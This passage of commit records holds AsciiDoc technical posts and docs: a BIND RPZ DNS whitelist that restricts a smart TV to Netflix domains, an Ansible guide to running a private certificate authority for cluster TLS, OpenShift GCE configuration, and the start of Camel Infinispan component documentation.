IN\tA\t52.208.81.52\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.174.58\n....\n\n== Additions for my Smart TV case\n\nIn addition to the above I changed the ACL for traffic coming from the TV to only allow TCP on ports 80 and 443, which is enough for Netflix, but importantly blocks the TV from using any external DNS (even in normal circumstances it looks like the TV will use 8.8.8.8 in addition to any configured DNS server entered on it).\n\nFinally on the TV I changed the DNS server and sure enough the TV thinks something is wrong with DNS:\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/4465905\/26027929\/bd59e8b2-380e-11e7-81b1-b8b2b8fd2ffe.JPG[Samsung Error Message]\n\nSo far so good, and yes the Netflix app still works fine. Looking closely at my Bind logs I can see what's happening:\n\n....\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.003 queries: info: client 192.168.240.42#40665 (art-0.nflximg.net): query: art-0.nflximg.net IN A + (192.168.240.32)\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.003 rpz: info: client 192.168.240.42#40665 (art-0.nflximg.net): rpz QNAME PASSTHRU rewrite art-0.nflximg.net via art-0.nflximg.net.rpz.netflix\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.766 queries: info: client 192.168.240.42#34179 (ns11.whois.co.kr): query: ns11.whois.co.kr IN A + (192.168.240.32)\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.766 rpz: info: client 192.168.240.42#34179 (ns11.whois.co.kr): rpz QNAME NXDOMAIN rewrite ns11.whois.co.kr via ns11.whois.co.kr.rpz\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.031 queries: info: client 192.168.240.42#59989 (time.samsungcloudsolution.com): query: time.samsungcloudsolution.com IN A + (192.168.240.32)\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.031 rpz: info: client 192.168.240.42#59989 (time.samsungcloudsolution.com): rpz QNAME NXDOMAIN rewrite time.samsungcloudsolution.com via time.samsungcloudsolution.com.rpz\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.033 queries: info: client 192.168.240.42#36357 (time.samsungcloudsolution.com): query: time.samsungcloudsolution.com IN A + (192.168.240.32)\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.033 rpz: info: client 192.168.240.42#36357 (time.samsungcloudsolution.com): rpz QNAME NXDOMAIN rewrite time.samsungcloudsolution.com via time.samsungcloudsolution.com.rpz\n....\n\n\nSo yeah, probably not ideal as the TV can still get out to the internet, at least on TCP ports 80 and 443, but without DNS I've hopefully limited how much it can do.\n","old_contents":"= DNS Whitelist in BIND with RPZ\n :hp-image: \/covers\/cover.png\n :hp-tags: DNS, Filtering, Firewall, Security\n\nI recently got a Samsung 'smart' TV which is very nice to look at.\n\nUnfortunately there have been numerous privacy issues with smart TVs of all kinds, and Samsung in http:\/\/www.bbc.com\/news\/technology-31296188[particular]. So to be safe I initially decided to block the TV completely from connecting to the internet, by blocking it at my router.\n\nAs it turns out, however, the built-in Netflix app on the TV is the only way I can watch true UHD (10bit colour) 4k content on the TV (don't get me started!)\n\nSo I found myself in a situation where I needed to allow the TV to connect out to the internet, despite my misgivings.\n\nBut this got me thinking - could I somehow limit its access to just Netflix? I modified the router ACL to allow it to talk to all the IPv4 prefixes announced by AS2906 [Netflix Streaming Services Inc.]
 This unfortunately didn't work; without looking too deeply, it seemed Akamai was involved in at least some of the traffic. Either way the app didn't work. I could have continued to investigate and added more IP ranges to the ACL to make it work, but it seemed like a lot of trouble.\n\nRuling out cumbersome IP-based blocking, I began to wonder: could I perhaps limit its access by restricting the domain names it could resolve?\n\n== Enter DNS RPZ\n\nI am relatively familiar with Bind, having used it down through the years, and one feature in particular suggested it might help - Response Policy Zones.\n\nBasically RPZ can be used to create a DNS \"firewall,\" limiting what domains can be resolved. There is plenty of information online about how this can be set up; however, I didn't find anything specifically explaining how to do what I needed (a total blacklist with only a very small whitelist of domains).\n\nTurns out it's fairly easy to do.\n\n== Bind Configuration\n\nThe first step is to get a basic Bind resolver up and running. I did this with a Ubuntu 16.04 system.\n\nI then defined two RPZ 'zones' in the 'options' section of my named.conf (on my particular system I did it in \/etc\/bind\/named.conf.options). The key thing here is that RPZ checks zones in the order they are listed - this is key to creating a whitelist as opposed to a blacklist. A single line is required:\n\n response-policy { zone \"rpz.whitelist\"; zone \"rpz\"; };\n \nAll queries will then be filtered based on the response policy zones listed. If a match is found in the first (rpz.whitelist) then that will be used, otherwise the second one (rpz) will be checked.\n\nThe Bind server needs to be configured as authoritative master for these zones, similar to a standard zone, although with \"allow-query\" set to none. Again this is in named.conf (in my case \/etc\/bind\/named.conf.default-zones):\n\n zone \"rpz.whitelist\" {\n type master;\n file \"\/etc\/bind\/db.rpz.whitelist\";\n allow-query { none; };\n };\n \n zone \"rpz\" {\n type master;\n file \"\/etc\/bind\/db.rpz\";\n allow-query { none; };\n };\n\nAs can be seen, the zone definitions reference the location of the zone file for each. The files are created as follows, using the RPZ syntax. The first zone, rpz.whitelist, lists the domains I had worked out Netflix used:\n\n_\/etc\/bind\/db.rpz.whitelist_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost. (\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum \n IN NS localhost.\n \n netflix.com CNAME rpz-passthru.\n *.netflix.com CNAME rpz-passthru.\n \n nflximg.com CNAME rpz-passthru.\n *.nflximg.com CNAME rpz-passthru.\n \n nflximg.net CNAME rpz-passthru.\n *.nflximg.net CNAME rpz-passthru.\n....\n \n\nNote that for each domain I have included the 'apex' record, and also a wildcard to catch all sub-domains. In each case they are listed as CNAME records pointing to rpz-passthru, which is the RPZ syntax to tell Bind to allow queries for them.\n\nThe second RPZ zone file is created as follows. This is configured for all sub-domains of the root zone, with a CNAME pointing to \".\" (which tells RPZ to return NXDOMAIN for such a lookup). As the trailing dot (root zone) is left out of entries in RPZ zones, an asterisk on its own is all that is needed to represent subdomains of the DNS root:\n\n_\/etc\/bind\/db.rpz_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost.
(\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum \n IN NS localhost.\n\n* CNAME .\n....\n\nWith the config in place I was able to reload Bind and check if it was working. \n\n\n== Results\n\nSo does it work. If I try to resolve a random domain I get an NXDOMAIN response:\n\n....\ntopranks@dnsvm:~$ dig A www.samsung.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.samsung.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14003\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 2\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.samsung.com.\t\tIN\tA\n....\n\n\nAnd if I try for a sub-domain of netflix.com I get a valid response:\n\n....\ntopranks@dnsvm:~$ dig A www.netflix.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.netflix.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59390\n;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 4, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.netflix.com.\t\tIN\tA\n\n;; ANSWER SECTION:\nwww.netflix.com.\t1800\tIN\tCNAME\twww.geo.netflix.com.\nwww.geo.netflix.com.\t1800\tIN\tCNAME\twww.eu-west-1.prodaa.netflix.com.\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.165.126\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.19.164.15\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.178.51\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.156.83\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.202.184\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.15.72\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.81.52\nwww.eu-west-1.prodaa.netflix.com. 
60 IN\tA\t52.208.174.58\n....\n\n== Additions for my Smart TV case\n\nIn addition to the above I changed the ACL for traffic coming from the TV to only allow TCP on ports 80 and 443, which is enough for Netflix, but importantly blocks the TV from using any external DNS (even in normal circumstances it looks like the TV will use 8.8.8.8 in addition to any configured DNS server entered on it).\n\nFinally on the TV I changed the DNS server and sure enough the TV thinks something is wrong:\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d86a51ed3e54ef52401d7298ecec0b71cf20976c","subject":"Final changes on build your own CA with Ansible","message":"Final changes on build your own CA with Ansible\n","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2020-11-28-Build-your-own-CA-with-Ansible.adoc","new_file":"_posts\/2020-11-28-Build-your-own-CA-with-Ansible.adoc","new_contents":"= Build your own CA with Ansible\n:page-tags: [ansible]\n:page-image: \/images\/logos\/ansible.png\n:source_dir: ..\/sources\/2020-11-28-Build-your-own-CA-with-Ansible\n:image_dir: ..\/images\/2020-11-28-Build-your-own-CA-with-Ansible\n:published_at: 2020-11-28\n:page-layout: post\n:page-description: \"How to generate certificates with Ansible.\"\n\nSecuring your Kafka, Elasticsearch, Cassandra, or whatever distributed software requires configuring SSL (also known as TLS) to encrypt communications:\n\n* Node to node communication\n* Client to node communication\n\nSetting up SSL means providing SSL certificates for each node.\nBut generating SSL certificates is a cumbersome task:\n\n* The https:\/\/kafka.apache.org\/documentation\/#security_ssl[Kafka documentation] describes the process extensively.\n* Elasticsearch brings its own https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/master\/configuring-tls.html#node-certificates[elasticsearch-certutil] tool.\n* Datastax also https:\/\/docs.datastax.com\/en\/cassandra-oss\/3.x\/cassandra\/configuration\/secureSSLCertWithCA.html[documents] a similar process for Cassandra.\n\nI will describe here how to generate an SSL certificate for each node using Ansible.\nIt makes sense as I am also deploying Kafka, Elasticsearch and the like with Ansible.\n\nThere are several important rules to know when generating certificates:\n\n* The name present in the certificate must match the public name of the host.\n We cannot share the same certificate on all nodes unless we use wildcard certificates.\n Any TLS client connecting to a node will check that the certificate name and the hostname match, unless hostname verification is disabled.\n* The name present in the certificate should match the reverse DNS name corresponding to the IP of the host.\n Java clients connecting to a node will do a reverse DNS lookup to get the public name of the host they are connecting to.\n\nThese two rules are meant to prevent *Man in the middle* attacks. 
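\nTo make these two rules easier to check in practice, here is a minimal sketch (the hostname, port and truststore are assumptions, not part of this article's playbooks) that connects to a node and prints the names its certificate actually presents; run it with `-Djavax.net.ssl.trustStore` pointing at a truststore containing the CA certificate, otherwise the handshake fails:\n\n[source,java]\n----\nimport java.security.cert.X509Certificate;\nimport javax.net.ssl.SSLSocket;\nimport javax.net.ssl.SSLSocketFactory;\n\npublic class ShowPeerNames {\n public static void main(String[] args) throws Exception {\n \/\/ Assumed node name and TLS port; adjust to your cluster\n String host = args.length > 0 ? args[0] : \"kafka-1.example.com\";\n int port = args.length > 1 ? Integer.parseInt(args[1]) : 9093;\n SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault();\n try (SSLSocket socket = (SSLSocket) factory.createSocket(host, port)) {\n socket.startHandshake(); \/\/ fails unless the CA is in the truststore\n X509Certificate cert = (X509Certificate) socket.getSession().getPeerCertificates()[0];\n System.out.println(\"Subject: \" + cert.getSubjectX500Principal());\n \/\/ May print null if the certificate carries no SANs\n System.out.println(\"SANs: \" + cert.getSubjectAlternativeNames());\n }\n }\n}\n----\n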
\nA TLS certificate lets you check that you are talking to the intended target, \nnot something in between which could spy on you and steal information.\n\nWhen a machine has multiple names (think about DNS aliases, virtual hosts), a certificate can contain multiple names.\nThe main name is called the CN (Common Name), \nwhile the other names are called SANs (Subject Alt Names).\n\n== The certificate authority\n\nAs Kafka or Elasticsearch clusters should never be publicly exposed,\nusing a public certificate authority (Thawte, Verisign and the like) is not necessary.\nA self-signed certificate authority local to the cluster or the environment (Dev, Q\/A) should be enough.\n\nSo the first step is to create a certificate authority that will be used to sign the certificates of all hosts belonging to our cluster.\nAs this step will be done only once, I won't automate it.\n\n[source,shell]\n----\n$ mkdir ownca\n$ openssl req -new -x509 \\\n -days 1825 \\ <1>\n -extensions v3_ca \\ <2>\n -keyout ownca\/root.key -out ownca\/root.crt <3>\n\nGenerating a RSA private key\n......+++++\n....+++++\nwriting new private key to 'ownca\/root.key'\nEnter PEM pass phrase: <4>\nVerifying - Enter PEM pass phrase:\n-----\nYou are about to be asked to enter information that will be incorporated\ninto your certificate request.\nWhat you are about to enter is what is called a Distinguished Name or a DN.\nThere are quite a few fields but you can leave some blank\nFor some fields there will be a default value,\nIf you enter '.', the field will be left blank.\n-----\nCountry Name (2 letter code) [AU]:FR <5>\nState or Province Name (full name) [Some-State]:.\nLocality Name (eg, city) []:.\nOrganization Name (eg, company) [Internet Widgits Pty Ltd]:eNova Conseil\nOrganizational Unit Name (eg, section) []:.\nCommon Name (e.g. server FQDN or YOUR name) []:Root\nEmail Address []:rootca@enova-conseil.com\n----\n<1> The CA root certificate will last 5 years\n<2> This certificate will be used as a CA\n<3> Generate both the key and the self-signed certificate\n<4> The key is protected with a password\n<5> Information describing the Root certificate\n\nFor safety reasons, the generated key should be kept secret and stored in a secure place:\n\n* It must not be transferred to the target Kafka servers\n* It must not be kept in source control (Git) unless protected with Ansible Vault\n\n== The node certificates\n\nThis is where Ansible comes in.\nAs your cluster might have many nodes, automating certificate generation makes sense.\nFor each target host, I will repeat the same process:\n\nimage::{image_dir}\/process.svg[Process]\n\n. On the target host, generate a key `target.key` and a CSR (Certificate Signing Request) `target.csr`\n. Pull the CSR to the control host. \n. Sign the CSR with the CA key.\n This will generate a certificate `target.crt`.\n. Push the generated certificate `target.crt` to the target host.\n The CA certificate `root.crt` is also pushed.\n\nAs the TLS keys `.key` are sensitive, they do not travel: they stay where they were generated.\nBy contrast, certificates `.crt` and CSRs `.csr` only contain public information.\n\n[source,yaml]\n----\ninclude::{source_dir}\/openssl\/tasks\/main.yml[tags=main]\n----\n\nOnce you have the key, the certificate and the CA certificate chain on the target host, you can start using them:\n\n[source,yaml]\n----\ninclude::{source_dir}\/openssl\/tasks\/main.yml[tags=after]\n----\n\nThe produced PKCS12 file can be used as a Java Keystore. 
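\nFor instance, a minimal sketch (the bundle path and password are assumptions) showing the JVM loading the generated PKCS12 bundle and listing its entries:\n\n[source,java]\n----\nimport java.io.FileInputStream;\nimport java.security.KeyStore;\nimport java.util.Collections;\n\npublic class LoadKeystore {\n public static void main(String[] args) throws Exception {\n \/\/ Assumed location and password of the PKCS12 file produced above\n KeyStore keystore = KeyStore.getInstance(\"PKCS12\");\n try (FileInputStream in = new FileInputStream(\"\/etc\/kafka\/ssl\/target.p12\")) {\n keystore.load(in, \"changeit\".toCharArray());\n }\n \/\/ Print each alias and the type of the certificate stored under it\n for (String alias : Collections.list(keystore.aliases())) {\n System.out.println(alias + \" -> \" + keystore.getCertificate(alias).getType());\n }\n }\n}\n----\n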
The `java_keystore` Ansible module can be used to create a JKS file instead.\n\nThe attentive reader has noticed I am using a bunch of `openssl_xxx` Ansible modules (namely `openssl_privatekey`, `openssl_csr`, `openssl_certificate` and `openssl_pkcs12`).\nThese modules require openssl and PyOpenSSL to be installed on each host.\n\n[source,yaml]\n----\ninclude::{source_dir}\/openssl\/tasks\/main.yml[tags=before]\n----\n","old_contents":"= Build your own CA with Ansible\n:page-tags: [ansible]\n:page-image: \/images\/logos\/ansible.png\n:source_dir: ..\/sources\/2020-11-28-Build-your-own-CA-with-Ansible\n:image_dir: ..\/images\/2020-11-28-Build-your-own-CA-with-Ansible\n:published_at: 2020-11-28\n:page-layout: post\n:page-description: \"How to generate certificates with Ansible.\"\n\nSecuring your Kafka, Elasticsearch, Cassandra, or whatever distributed software means using SSL (also known as TLS) to encrypt communications:\n\n* Node to node communication\n* Client to node communication\n\nSetting up SSL means providing SSL certificates for each node.\nGenerating SSL certificates is a cumbersome task:\n\n* The https:\/\/kafka.apache.org\/documentation\/#security_ssl[Kafka documentation] describes extensively the process.\n* Elasticsearch brings its own https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/master\/configuring-tls.html#node-certificates[elasticsearch-certutil] tool.\n* Datastax also https:\/\/docs.datastax.com\/en\/cassandra-oss\/3.x\/cassandra\/configuration\/secureSSLCertWithCA.html[documents] a similar process for Cassandra\n\nI will describe here how to generate an SSL certificate for each node using Ansible,\nbecause I am also deploying Kafka, Elasticsearch and the like with Ansible.\n\nThere are several important rules to know when generating certificates:\n\n* The name present in the certificate must match the public name of the host.\n We can not share the same certificate on all nodes unless using star certificates.\n Any TLS client connecting to a node will check that certificate name and hostname matches unless disabling hostname verification.\n* The name present in the certificate, should match the reverse DNS name corresponding to the IP of the host.\n Java clients connecting to a node, will do a reverse DNS lookup to get the public name of the host they are connecting to.\n\nThese two rules are meant to prevent *Man in the middle* attacks. 
\nA TLS certificate allows checking you're talking to the wanted target, \nnot something in between which could spy and steal information.\n\nWhen a machine has multiple names (think about DNS aliases, virtual hosts), a certificate can contain multiple names.\nThe main name is called CN (Common Name), \nwhile other names are called SAN (Subject Alt Names).\n\n== The certificate authority\n\nAs Kafka or Elasticsearch clusters should never be publicly exposed,\nusing a public certificate authority (Thawte, Verisign and the like) is not necessary.\nA self-signed certificate authority local to the cluster or the environment (Dev, Q\/A) should be enough.\n\nSo the first step is to create a certificate authority that will be used to sign the certificates of all hosts belonging to our cluster.\nAs this step will be done only once, I won't automate it.\n\n[source,shell]\n----\n$ mkdir ownca\n$ openssl req -new -x509 \\\n -days 1825 \\ <1>\n -extensions v3_ca \\ <2>\n -keyout ownca\/root.key -out ownca\/root.crt <3>\n\nGenerating a RSA private key\n......+++++\n....+++++\nwriting new private key to 'ownca\/root.key'\nEnter PEM pass phrase: <4>\nVerifying - Enter PEM pass phrase:\n-----\nYou are about to be asked to enter information that will be incorporated\ninto your certificate request.\nWhat you are about to enter is what is called a Distinguished Name or a DN.\nThere are quite a few fields but you can leave some blank\nFor some fields there will be a default value,\nIf you enter '.', the field will be left blank.\n-----\nCountry Name (2 letter code) [AU]:FR <5>\nState or Province Name (full name) [Some-State]:.\nLocality Name (eg, city) []:.\nOrganization Name (eg, company) [Internet Widgits Pty Ltd]:eNova Conseil\nOrganizational Unit Name (eg, section) []:.\nCommon Name (e.g. server FQDN or YOUR name) []:Root\nEmail Address []:rootca@enova-conseil.com\n----\n<1> The CA root certificate will last 5 years\n<2> This certificate will be used as a CA\n<3> Generate both key and self-signed certificate\n<4> The key is protected with a password\n<5> Information describing the Root certificate\n\nFor safety reasons, the generated key should be kept secret and stored in a secure place:\n\n* It must not be transfered to target Kafka servers\n* It must not be kept in source control (Git) unless hidden in Ansible Vault password file\n\n== The nodes certificates\n\nThis is where Ansible comes in.\nAs your cluster might have many nodes, automating certificate generation makes sense.\nFor each target host, I will repeat the same process:\n\nimage::{image_dir}\/process.svg[Process]\n\n. On the target host, generate a key `target.key` and a CSR (Certificate signing request) `target.csr`\n. Pull the CSR on the control host. \n. Sign the CSR with the CA key.\n This will generate a certificate `target.crt`.\n. Push the generated certificate `target.crt` on the target host.\n The CA certificate `root.crt` is also pushed.\n\nAs the TLS keys `.key` are sensitive, they do not travel, they stay where they were generated.\nOn the contrary, certificates `.crt` and CSRs `.csr` only contain public information.\n\n[source,yaml]\n----\ninclude::{source_dir}\/openssl\/tasks\/main.yml[tags=main]\n----\n\nOnce you have the key, the certificate and CA certificate chain on the target host, you can start using them:\n\n[source,yaml]\n----\ninclude::{source_dir}\/openssl\/tasks\/main.yml[tags=after]\n----\n\nThe produced PKCS12 file can be used as a Java Keystore. 
The `java_keystore` Ansible module can be used to create a JKS file instead.\n\nThe attentive reader has noticed I am using a bunch of `openssl_xxx` Ansible modules (namely `openssl_privatekey`, `openssl_csr`, `openssl_certificate` and `openssl_pkcs12`).\nThese modules require to have openssl and PyOpenSSL installed on each host.\n\n[source,yaml]\n----\ninclude::{source_dir}\/openssl\/tasks\/main.yml[tags=before]\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c8e52e3f57acfcf8ba5ef3c54475dd9633382f69","subject":"Add unique anchors for Config GCE sections","message":"Add unique anchors for Config GCE sections\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"install_config\/configuring_gce.adoc","new_file":"install_config\/configuring_gce.adoc","new_contents":"= Configuring for GCE\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Overview\nOpenShift can be configured to access an\nlink:https:\/\/cloud.google.com\/compute\/docs\/disks\/[GCE infrastructure], including\nlink:..\/install_config\/persistent_storage\/persistent_storage_gce.html[using GCE\nvolumes as persistent storage] for application data. After GCE is configured\nproperly, some additional configurations will need to be completed on the\nOpenShift hosts.\n\n[[gce-configuring-masters]]\n== Configuring Masters\n\nEdit or\nlink:..\/install_config\/master_node_configuration.html#creating-new-configuration-files[create] the\nmaster configuration file on all masters\n(*_\/etc\/origin\/master\/master-config.yaml_* by default) and update the\ncontents of the `*apiServerArguments*` and `*controllerArguments*` sections:\n\n====\n[source,yaml]\n----\nkubernetesMasterConfig:\n ...\n apiServerArguments:\n cloud-provider:\n - \"gce\"\n controllerArguments:\n cloud-provider:\n - \"gce\"\n\n----\n====\n\n[[gce-configuring-nodes]]\n== Configuring Nodes\n\nEdit or\nlink:..\/install_config\/master_node_configuration.html#creating-new-configuration-files[create]\nthe node configuration file on all nodes (*_\/etc\/origin\/node\/node-config.yaml_*\nby default) and update the contents of the `*kubeletArguments*` section:\n\n====\n[source,yaml]\n----\nkubeletArguments:\n cloud-provider:\n - \"gce\"\n\n----\n====\n\nStart or restart the OpenShift services on the master and all nodes.\n","old_contents":"= Configuring for GCE\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Overview\nOpenShift can be configured to access an\nlink:https:\/\/cloud.google.com\/compute\/docs\/disks\/[GCE infrastructure], including\nlink:..\/install_config\/persistent_storage\/persistent_storage_gce.html[using GCE\nvolumes as persistent storage] for application data. 
After GCE is configured\nproperly, some additional configurations will need to be completed on the\nOpenShift hosts.\n\n== Configuring Masters\n\nEdit or\nlink:..\/install_config\/master_node_configuration.html#creating-new-configuration-files[create] the\nmaster configuration file on all masters\n(*_\/etc\/origin\/master\/master-config.yaml_* by default) and update the\ncontents of the `*apiServerArguments*` and `*controllerArguments*` sections:\n\n====\n[source,yaml]\n----\nkubernetesMasterConfig:\n ...\n apiServerArguments:\n cloud-provider:\n - \"gce\"\n controllerArguments:\n cloud-provider:\n - \"gce\"\n\n----\n====\n\n== Configuring Nodes\n\nEdit or\nlink:..\/install_config\/master_node_configuration.html#creating-new-configuration-files[create]\nthe node configuration file on all nodes (*_\/etc\/origin\/node\/node-config.yaml_*\nby default) and update the contents of the `*kubeletArguments*` section:\n\n====\n[source,yaml]\n----\nkubeletArguments:\n cloud-provider:\n - \"gce\"\n\n----\n====\n\n\n\nStart or restart the OpenShift services on the master and all nodes.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"954418f399c3903900d4f0b3a92e3ce21c7b9668","subject":"updating the infinispan documentation","message":"updating the infinispan documentation\n","repos":"zregvart\/camel,adessaigne\/camel,gnodet\/camel,apache\/camel,pmoerenhout\/camel,alvinkwekel\/camel,cunningt\/camel,apache\/camel,apache\/camel,CodeSmell\/camel,pax95\/camel,zregvart\/camel,cunningt\/camel,apache\/camel,christophd\/camel,tdiesler\/camel,tadayosi\/camel,objectiser\/camel,cunningt\/camel,christophd\/camel,nicolaferraro\/camel,ullgren\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,zregvart\/camel,alvinkwekel\/camel,mcollovati\/camel,christophd\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,DariusX\/camel,tadayosi\/camel,objectiser\/camel,gnodet\/camel,adessaigne\/camel,tdiesler\/camel,gnodet\/camel,DariusX\/camel,pmoerenhout\/camel,mcollovati\/camel,pax95\/camel,adessaigne\/camel,tadayosi\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,apache\/camel,tdiesler\/camel,alvinkwekel\/camel,apache\/camel,cunningt\/camel,CodeSmell\/camel,DariusX\/camel,nikhilvibhav\/camel,tadayosi\/camel,DariusX\/camel,CodeSmell\/camel,tdiesler\/camel,nicolaferraro\/camel,ullgren\/camel,CodeSmell\/camel,mcollovati\/camel,tdiesler\/camel,pax95\/camel,zregvart\/camel,adessaigne\/camel,ullgren\/camel,cunningt\/camel,gnodet\/camel,christophd\/camel,pax95\/camel,objectiser\/camel,mcollovati\/camel,alvinkwekel\/camel,gnodet\/camel,pax95\/camel,objectiser\/camel,nicolaferraro\/camel,christophd\/camel,ullgren\/camel,adessaigne\/camel,christophd\/camel,adessaigne\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nicolaferraro\/camel,tdiesler\/camel,pax95\/camel","old_file":"components\/camel-infinispan\/src\/main\/docs\/infinispan-component.adoc","new_file":"components\/camel-infinispan\/src\/main\/docs\/infinispan-component.adoc","new_contents":"[[infinispan-component]]\n= Infinispan Component\n\n*Available as of Camel version 2.13*\n\nThis component allows you to interact with\nhttp:\/\/infinispan.org\/[Infinispan] distributed data grid \/ cache.\nInfinispan is an extremely scalable, highly available key\/value data\nstore and data grid platform written in Java.\n\nInfinispan requires at least Java 8.\n\nThe `camel-infinispan` component includes the following features:\n\n* *Local Camel Consumer* - Receives cache change notifications and sends them to be processed.\nThis can be done 
synchronously or asynchronously, and is also supported with a replicated or distributed cache.\n\n* *Local Camel Producer* - A producer creates and sends messages to an endpoint.\nThe `camel-infinispan` producer uses ``GET``, ``PUT``, ``REMOVE``, and `CLEAR` operations.\nThe local producer is also supported with a replicated or distributed cache.\n\n* *Remote Camel Producer* - In Remote Client-Server mode, the Camel producer can send messages using Hot Rod.\n\n* *Remote Camel Consumer* - In Client-Server mode, receives cache change notifications and sends them to be processed.\nThe events are processed asynchronously.\n\nIf you use Maven, you must add the following dependency to your `pom.xml`:\n\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-infinispan<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\n== URI format\n\n[source,java]\n-------------------------------\ninfinispan:\/\/cacheName?[options]\n-------------------------------\n\n== URI Options\n\nThe producer allows sending messages to a local infinispan cache\nconfigured in the registry, or to a remote cache using the HotRod\nprotocol. The consumer allows listening for events from local infinispan cache\naccessible from the registry.\n\n\n\/\/ component options: START\nThe Infinispan component supports 4 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (common) | The default configuration shared among endpoints. | | InfinispanConfiguration\n| *cacheContainer* (common) | The default cache container. | | BasicCacheContainer\n| *resolveProperty Placeholders* (advanced) | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe Infinispan endpoint is configured using URI syntax:\n\n----\ninfinispan:cacheName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cacheName* | *Required* The cache to use | | String\n|===\n\n\n=== Query Parameters (21 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *hosts* (common) | Specifies the host of the cache on Infinispan instance | | String\n| *queryBuilder* (common) | Specifies the query builder. | | InfinispanQueryBuilder\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. 
| false | boolean\n| *clusteredListener* (consumer) | If true, the listener will be installed for the entire cluster | false | boolean\n| *command* (consumer) | *Deprecated* The operation to perform. | PUT | String\n| *customListener* (consumer) | Returns the custom listener in use, if provided | | InfinispanCustom Listener\n| *eventTypes* (consumer) | Specifies the set of event types to register by the consumer. Multiple event can be separated by comma. The possible event types are: CACHE_ENTRY_ACTIVATED, CACHE_ENTRY_PASSIVATED, CACHE_ENTRY_VISITED, CACHE_ENTRY_LOADED, CACHE_ENTRY_EVICTED, CACHE_ENTRY_CREATED, CACHE_ENTRY_REMOVED, CACHE_ENTRY_MODIFIED, TRANSACTION_COMPLETED, TRANSACTION_REGISTERED, CACHE_ENTRY_INVALIDATED, DATA_REHASHED, TOPOLOGY_CHANGED, PARTITION_STATUS_CHANGED | | String\n| *sync* (consumer) | If true, the consumer will receive notifications synchronously | true | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. 